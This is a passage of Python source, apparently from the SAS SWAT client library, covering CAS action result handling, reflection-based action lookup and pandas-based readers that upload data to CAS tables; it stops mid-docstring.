This function closely mimics what the `retrieve` method does by default.
>>> def myfunc(response, connection, userdata):
... if userdata is None:
... userdata = {}
... for key, value in response:
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', responsefunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
The same result can be gotten using the ``resultfunc`` option as well.
>>> def myfunc(key, value, response, connection, userdata):
... if userdata is None:
... userdata = {}
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', resultfunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
'''
kwargs = dict(kwargs)
# Decode from JSON as needed
if '_json' in kwargs:
newargs = json.loads(kwargs['_json'])
newargs.update(kwargs)
del newargs['_json']
kwargs = newargs
datamsghandler = None
if 'datamsghandler' in kwargs:
datamsghandler = kwargs['datamsghandler']
kwargs.pop('datamsghandler')
if self._protocol.startswith('http'):
raise SWATError('Data message handlers are not supported '
'in the REST interface.')
# Response callback function
responsefunc = None
if 'responsefunc' in kwargs:
responsefunc = kwargs['responsefunc']
kwargs.pop('responsefunc')
# Result callback function
resultfunc = None
if 'resultfunc' in kwargs:
resultfunc = kwargs['resultfunc']
kwargs.pop('resultfunc')
try:
# Call the action and compile the results
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
except SWATCASActionRetry:
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
# Return raw data if a function was supplied
if responsefunc is not None or resultfunc is not None:
return results
results.signature = signature
# run post-processing hooks
if signature and signature.get('name') in self._results_hooks:
for func in self._results_hooks[signature['name']]:
func(self, results)
return results
def _get_results(self, riter, responsefunc=None, resultfunc=None):
'''
Walk through responses in ``riter`` and compile results
Parameters
----------
riter : iterable
Typically a CAS object, but any iterable that returns a
response / connection pair for each iteration can be used.
responsefunc : callable, optional
Callback function that is called for each response
resultfunc : callable, optional
Callback function that is called for each result
Returns
-------
CASResults
If no callback functions were supplied.
any
If a callback function is supplied, the result of that function
is returned.
'''
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
resultdata = None
responsedata = None
try:
for response, conn in riter:
if response.disposition.status_code == RETRY_ACTION_CODE:
raise SWATCASActionRetry(response.disposition.status)
elif response.disposition.status_code == SESSION_ABORTED_CODE:
# Any new requests sent to the session will never return,
# so just close the connection now.
self.close()
raise SWATCASActionError(response.disposition.status, response, conn)
if responsefunc is not None:
responsedata = responsefunc(response, conn, responsedata)
continue
# Action was restarted by the server
if 'action-restart' in response.updateflags:
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
continue
# CASTable parameters
caslib = None
tablename = None
castable = None
for key, value in response:
if resultfunc is not None:
resultdata = resultfunc(key, value, response,
conn, resultdata)
continue
if key is None or isinstance(key, int_types):
results[idx] = value
idx += 1
else:
lowerkey = key.lower()
if lowerkey == 'tablename':
tablename = value
elif lowerkey == 'caslib':
caslib = value
elif lowerkey == 'castable':
castable = True
# Event results start with '$'
if key.startswith('$'):
events[key] = value
else:
results[key] = value
# Create a CASTable instance if all of the pieces are there
if caslib and tablename and not castable:
results['casTable'] = self.CASTable(tablename, caslib=caslib)
results.performance = response.performance
for key, value in six.iteritems(response.disposition.to_dict()):
setattr(results, key, value)
messages.extend(response.messages)
updateflags.update(response.updateflags)
except SWATCASActionError as err:
if responsefunc:
err.results = responsedata
elif resultfunc:
err.results = resultdata
else:
err.results = results
err.events = events
raise err
if responsefunc is not None:
return responsedata
if resultfunc is not None:
return resultdata
return results
def __getattr__(self, name, atype=None):
'''
Convenience method for getting a CASActionSet/CASAction as an attribute
When an attribute that looks like an action name is accessed, CAS
is queried to see if it is an action set or action name. If so,
the reflection information for the entire actionset is used to
generate classes for the actionset and all actions.
Parameters
----------
name : string
Action name or action set name
atype : string, optional
Type of item to search for exclusively ('actionset', 'action',
or 'action_class')
Returns
-------
CASAction
If `name` is an action name
CASActionSet
If `name` is an action set name
Raises
------
AttributeError
if `name` is neither an action name or action set name
'''
class_requested = False
origname = name
# Normalize name
if re.match(r'^[A-Z]', name):
class_requested = True
if atype is not None and atype == 'action_class':
class_requested = True
atype = 'action'
name = name.lower()
# Check cache for actionset and action classes
if (atype in [None, 'actionset'] and name in self._actionset_classes
and self._actionset_classes[name] is not None):
return self._actionset_classes[name]()
if (atype in [None, 'action'] and name in self._action_classes
and self._action_classes[name] is not None):
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
# See if the action/action set exists
asname, actname, asinfo = self._get_actionset_info(name.lower(), atype=atype)
# Generate a new actionset class
ascls = CASActionSet.from_reflection(asinfo, self)
# Add actionset and actions to the cache
self._actionset_classes[asname.lower()] = ascls
for key, value in six.iteritems(ascls.actions):
self._action_classes[key] = value
self._action_classes[asname.lower() + '.' + key] = value
# Check cache for actionset and action classes
if atype in [None, 'actionset'] and name in self._actionset_classes:
return self._actionset_classes[name]()
if atype in [None, 'action'] and name in self._action_classes:
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
# Look for actions that can't be reflected
if asname and actname:
enabled = ['yes', 'y', 'on', 't', 'true', '1']
if os.environ.get('CAS_ACTION_TEST_MODE', '').lower() in enabled:
if asname not in self._actionset_classes:
self._actionset_classes[asname.lower()] = ascls
else:
ascls = self._actionset_classes[asname.lower()]
if actname not in ascls.actions:
ascls.actions[actname.lower()] = None
return getattr(ascls(), actname)
raise AttributeError(origname)
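# Illustrative sketch (not part of the original source): attribute access on the
# connection resolves action and action set names through the reflection caches
# built above, so the following two calls are expected to reach the same action:
# >>> conn.serverstatus()             # bare action name
# >>> conn.builtins.serverstatus()    # same action through its action set
# The first lookup triggers reflection; later lookups are served from
# self._actionset_classes / self._action_classes.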
def _get_action_info(self, name, showhidden=True, levels=None):
'''
Get the reflection information for the given action name
Parameters
----------
name : string
Name of the action
showhidden : boolean
Should hidden actions be shown?
levels : int, optional
Number of levels of reflection data to return. Default is all.
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-info-dict
'''
name = name.lower()
if name in self._action_info:
return self._action_info[name]
asname, actname, asinfo = self._get_reflection_info(name,
showhidden=showhidden,
levels=levels)
# If action name is None, it is the same as the action set name
if actname is None:
actname = asname
# Populate action set info while we're here
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info
actinfo = {}
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
if aname == actname.lower():
actinfo = item
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, actinfo
def _get_actionset_info(self, name, atype=None, showhidden=True, levels=None):
'''
Get the reflection information for the given action set / action name
If the name is an action set, the returned action name will be None.
Parameters
----------
name : string
Name of the action set or action
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
levels : int, optional
Number of levels of reflection data to return. Default is all.
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-set-info-dict
'''
name = name.lower()
if atype in [None, 'actionset'] and name in self._actionset_info:
return self._actionset_info[name]
if atype in [None, 'action'] and name in self._action_info:
asname, aname, actinfo = self._action_info[name]
return asname, aname, self._actionset_info[asname.lower()][-1]
asname, actname, asinfo = self._get_reflection_info(name, atype=atype,
showhidden=showhidden,
levels=levels)
# Populate action set info
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info while we're here
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, asinfo
def _get_reflection_info(self, name, atype=None, showhidden=True, levels=None):
'''
Resolve the given action or action set name and return its reflection information
Parameters
----------
name : string
Name of the action or action set
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
levels : int, optional
Number of levels of reflection data to return. Default is all.
Returns
-------
tuple
( action set name, action name, action set reflection info )
'''
asname = None
actname = None
# See if the name is an action set name, action name, or nothing
if atype in [None, 'actionset']:
for response in self._invoke_without_signature('builtins.queryactionset',
actionset=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if value:
asname = name.lower()
break
if asname is None:
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.queryname',
name=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
asname = out.get('actionSet')
actname = out.get('action')
# We can't have both in the same namespace, action set name wins
if asname == actname:
actname = None
# If we have an action set name, reflect it
if asname:
asname = asname.lower()
query = {'showhidden': showhidden, 'actionset': asname}
if not get_option('interactive_mode'):
query['showlabels'] = False
if 'reflection-levels' in self.server_features:
if levels is not None:
query['levels'] = levels
else:
query['levels'] = get_option('cas.reflection_levels')
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.reflect',
_messagelevel='error',
_apptag='UI', **query):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
# Normalize the output
asinfo = _lower_actionset_keys(out[0])
for act in asinfo.get('actions'):
act['name'] = (asname + '.' + act['name']).lower()
return asname, actname, asinfo
raise AttributeError(name)
def __iter__(self):
'''
Iterate over responses from CAS
If you used the :meth:`invoke` method to call a CAS action, the
responses from the server are not automatically retrieved. You
will need to pull them down manually. Iterating over the CAS
connection object after calling :meth:`invoke` will pull responses
down until they have been exhausted.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> for resp in conn:
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`invoke` : Calls a CAS action without retrieving results
:meth:`retrieve` : Calls a CAS action and retrieves results
Yields
------
:class:`CASResponse` object
'''
for response, conn in getnext(self, timeout=0):
if conn is not None:
yield response
#
# Top-level Pandas functions
#
def _get_table_args(self, **kwargs):
''' Extract table parameters from function arguments '''
out = {}
kwargs = kwargs.copy()
casout = kwargs.pop('casout', {})
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
elif not isinstance(casout, dict):
casout = dict(name=casout)
out['table'] = casout.get('name', None)
out['caslib'] = casout.get('caslib', None)
out['replace'] = casout.get('replace', None)
out['label'] = casout.get('label', None)
out['promote'] = casout.get('promote', None)
if not out['table']:
out.pop('table')
if not out['caslib']:
out.pop('caslib')
if out['replace'] is None:
out.pop('replace')
if out['label'] is None:
out.pop('label')
if out['promote'] is None:
out.pop('promote')
return out, kwargs
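# Illustrative sketch (hypothetical values): a casout= specification such as
#     casout = dict(name='mytable', caslib='casuser', replace=True)
# is split by _get_table_args into the output-table parameters
#     {'table': 'mytable', 'caslib': 'casuser', 'replace': True}
# plus the remaining keyword arguments, which are later passed on to the
# pandas reader function.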
def load_path(self, path=None, readahead=None, importoptions=None,
promote=None, ondemand=None, attrtable=None,
caslib=None, datasourceoptions=None, casout=None, singlepass=None,
where=None, vars=None, groupby=None, groupbyfmts=None,
groupbymode=None, orderby=None, nosource=None, returnwhereinfo=None,
**kwargs):
'''
Load a path from a CASLib
The parameters for this are the same as for the ``builtins.loadtable``
CAS action. This method is simply a convenience method that loads a
table and returns a :class:`CASTable` in one step.
Notes
-----
The path specified must exist on the **server side**. For loading
data from the client side, see the ``read_*`` and :meth:`upload` methods.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.load_path('data/iris.csv')
>>> print(tbl.head())
See Also
--------
:meth:`read_csv`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
args = {k: v for k, v in dict(path=path, readahead=readahead,
importoptions=importoptions, promote=promote,
ondemand=ondemand, attrtable=attrtable, caslib=caslib,
datasourceoptions=datasourceoptions, casout=casout,
singlepass=singlepass, where=where, vars=vars, groupby=groupby,
groupbyfmts=groupbyfmts, groupbymode=groupbymode,
orderby=orderby, nosource=nosource,
returnwhereinfo=returnwhereinfo).items() if v is not None}
args.update(kwargs)
out = self.retrieve('table.loadtable', _messagelevel='error', **args)
try:
return out['casTable']
except KeyError:
raise SWATError(out.status)
def _importoptions_from_dframe(self, dframe):
'''
Derive importoptions= values from DataFrame
'''
use_options = False
ivars = []
importoptions = dict(filetype='csv', vars=ivars)
for i, dtype in enumerate(dframe.dtypes.values):
dtype = str(dtype)
if 'int64' in dtype:
ivars.append(dict(type='int64'))
use_options = True
elif 'int32' in dtype:
ivars.append(dict(type='int32'))
use_options = True
else:
ivars.append({})
if use_options:
return importoptions
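# Illustrative sketch (hypothetical frame): for a DataFrame with dtypes
# [int64, float64] this method would return
#     {'filetype': 'csv', 'vars': [{'type': 'int64'}, {}]}
# and it implicitly returns None when the frame has no integer columns.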
def _read_any(self, _method_, *args, **kwargs):
'''
Generic data file reader
Parameters
----------
_method_ : string
The name of the pandas data reader function.
*args : one or more arguments
Arguments to pass to the data reader.
**kwargs : keyword arguments
Keyword arguments to pass to the data reader function.
The keyword parameters 'table', 'caslib', 'promote', and
'replace' will be stripped to use for the output CAS
table parameters.
Returns
-------
:class:`CASTable`
'''
import pandas as pd
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(**kwargs)
dframe = getattr(pd, _method_)(*args, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_pickle(self, path, casout=None, **kwargs):
'''
Load pickled pandas object from the specified path
This method calls :func:`pandas.read_pickle` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path : string
Path to a local pickle file.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_pickle`.
Notes
-----
Paths to specified files point to files on the **client machine**.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_pickle('dataframe.pkl')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_pickle`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_pickle', path, casout=casout, **kwargs)
def read_table(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read general delimited file into a CAS table
This method calls :func:`pandas.read_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_table('iris.tsv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_table(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.Text(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_csv(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read CSV file into a CAS table
This method calls :func:`pandas.read_csv` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_csv`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_csv('iris.csv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_csv(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.CSV(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_frame(self, dframe, casout=None, **kwargs):
'''
Convert DataFrame to CAS table
Parameters
----------
dframe : DataFrame
The DataFrame to read into CAS
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
Notes
-----
When `use_addtable=False` (the default) is specified, this method
is equivalent to `upload_frame`. If `use_addtable=True` is specified,
the `table.addtable` CAS action is used and the DataFrame does not
need to be written to disk first. However, this mode can only be used
with the binary (not REST) protocol.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_frame(pd.DataFrame(np.random.randn(100, 4),
... columns=list('ABCD')))
>>> print(tbl.head())
See Also
--------
:meth:`upload_frame`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
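# Illustrative sketch (binary protocol assumed): with use_addtable=True the
# frame is streamed through the table.addtable action instead of being
# written out and uploaded:
# >>> tbl = conn.read_frame(dframe, casout='mytable', use_addtable=True)
# Over the REST interface the flag is ignored and upload_frame is used,
# as noted in the docstring above.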
def read_fwf(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read a table of fixed-width formatted lines into a CAS table
This method calls :func:`pandas.read_fwf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_fwf`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_fwf('iris.dat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_fwf`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_fwf(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.FWF(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_clipboard(self, casout=None, **kwargs):
'''
Read text from clipboard and pass to :meth:`read_table`
Parameters
----------
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
See Also
--------
:func:`pandas.read_clipboard`
:func:`pandas.read_table`
:meth:`read_table`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_clipboard', casout=casout, **kwargs)
def read_excel(self, io, casout=None, **kwargs):
'''
Read an Excel table into a CAS table
This method calls :func:`pandas.read_excel` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or path object
File-like object, URL, or pandas ExcelFile.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_excel`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_excel('iris.xlsx')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_excel`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_excel', io, casout=casout, **kwargs)
def read_json(self, path_or_buf=None, casout=None, **kwargs):
'''
Read a JSON string into a CAS table
This method calls :func:`pandas.read_json` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the JSON data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_json`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_json('iris.json')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_json`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_json', path_or_buf, casout=casout, **kwargs)
def json_normalize(self, data, casout=None, **kwargs):
'''
"Normalize" semi-structured JSON data into a flat table and upload to a CAS table
This method calls :func:`pandas.json_normalize` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
data : dict or list of dicts
Unserialized JSON objects
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.json_normalize`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.json_normalize([{'a': 1, 'b': 2}, {'a': 3, 'b': 4}])
>>> print(tbl.head())
See Also
--------
:func:`pandas.json_normalize`
Returns
-------
:class:`CASTable`
'''
return self._read_any('json_normalize', data, casout=casout, **kwargs)
def read_html(self, io, casout=None, **kwargs):
'''
Read HTML tables into a list of CASTable objects
This method calls :func:`pandas.read_html` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or file-like object
The path, URL, or file object that contains the HTML data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_html`.
Examples
--------
>>> conn = swat.CAS()
>>> tbls = conn.read_html('iris.html')
>>> print(tbls[0].head())
See Also
--------
:func:`pandas.read_html`
Returns
-------
list of :class:`CASTable` objects
'''
import pandas as pd
from swat import datamsghandlers as dmh
use_addtable = kwargs.pop('use_addtable', False)
out = []
table, kwargs = self._get_table_args(casout=casout, **kwargs)
for i, dframe in enumerate(pd.read_html(io, **kwargs)):
if i and table.get('table'):
table['table'] += str(i)
if not use_addtable or self._protocol.startswith('http'):
out.append(self.upload_frame(dframe, casout=table and table or None))
# importoptions=self._importoptions_from_dframe(dframe)
else:
table.update(dmh.PandasDataFrame(dframe).args.addtable)
out.append(self.retrieve('table.addtable', **table).casTable)
return out
def read_hdf(self, path_or_buf, casout=None, **kwargs):
'''
Read from the HDF store and create a CAS table
This method calls :func:`pandas.read_hdf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the HDF data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_hdf`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_hdf('iris.h5')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_hdf`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_hdf', path_or_buf, casout=casout, **kwargs)
def read_sas(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read SAS files stored as XPORT or SAS7BDAT into a CAS table
This method calls :func:`pandas.read_sas` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
The path, URL, or file object that contains the SAS data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sas`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sas('iris.sas7bdat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_sas`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sas', filepath_or_buffer, casout=casout, **kwargs)
def read_sql_table(self, table_name, con, casout=None, **kwargs):
'''
Read SQL database table into a CAS table
This method calls :func:`pandas.read_sql_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
table_name : string
Name of SQL table in database.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_table('iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connector from CAS.
See Also
--------
:func:`pandas.read_sql_table`
:meth:`read_sql_query`
:meth:`read_sql`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql_table', table_name, con, casout=casout, **kwargs)
def read_sql_query(self, sql, con, casout=None, **kwargs):
'''
Read SQL query table into a CAS table
This method calls :func:`pandas.read_sql_query` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_query`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_query('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connector from CAS.
See Also
--------
:func:`pandas.read_sql_query`
:meth:`read_sql_table`
:meth:`read_sql`
Returns
-------
